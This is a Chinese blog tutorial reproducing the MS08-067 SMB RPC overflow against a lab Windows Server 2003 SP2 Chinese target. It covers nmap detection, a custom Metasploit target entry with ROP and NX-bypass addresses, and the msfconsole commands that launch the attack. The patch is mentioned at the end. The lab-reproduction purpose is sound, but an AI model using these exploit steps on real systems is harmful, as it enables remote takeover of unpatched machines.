MS08-067 RPC请求缓冲区溢出漏洞利用


漏洞描述

  Windows 系统上的服务器服务中存在一个远程执行代码漏洞。 该漏洞是由于服务不正确地处理特制的 RPC 请求导致的。 成功利用此漏洞的攻击者可以完全控制受影响的系统。

影响系统

  • Windows Vista
  • Windows 2000 Service
  • Windows Server 2008
  • Windows Server 2003
  • Windows XP

漏洞检测

nmap进行漏洞检测

#nmap 目标ip --script=smb-vuln-ms08-067.nse
nmap 192.168.234.129 --script=smb-vuln-ms08-067.nse

提示VULNERABLE表示漏洞存在

在这里插入图片描述

漏洞利用

漏洞利用工具为msf,我复现的系统为Windows Server 2003 SP2 中文版。但我发现msf中没有中文版 的 exp 框架。
在这里插入图片描述

添加漏洞利用代码:

#修改msf漏洞利用代码
vim /usr/share/metasploit-framework/modules/exploits/windows/smb/ms08_067_netapi.rb

添加以下内容:

 [ 'Windows 2003 SP2 Chinese (NX)',
   {
	  'RetDec'    => 0x7c99beb8,  # dec ESI, ret @NTDLL.DLL (0x4EC3)
	  'RetPop'    => 0x7cb5e84e,  # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)
	  'JmpESP'    => 0x7c99a01b,  # jmp ESP @NTDLL.DLL(0xFFE4)
	  'DisableNX' => 0x7c96f517,  # NX disable @NTDLL.DLL
          'Scratch'   => 0x00020408,
   }
],

在这里插入图片描述

#进入msf
msfconsole

#查找漏洞框架并调用
search ms08-067
use exploit/windows/smb/ms08_067_netapi

查看系统exp框架时,可以看到我们添加的windwos 2003 SP2 Chinese

show targets

在这里插入图片描述

设置好目标ip及其他参数,即可开始攻击

set target 1
set rhost 192.168.234.129
show options

在这里插入图片描述
在这里插入图片描述

漏洞加固

微软已发布MS08-067补丁:
http://technet.microsoft.com/zh-cn/security/bulletin/ms08-067

猜你喜欢

转载自blog.csdn.net/weixin_41924764/article/details/109672737
今日推荐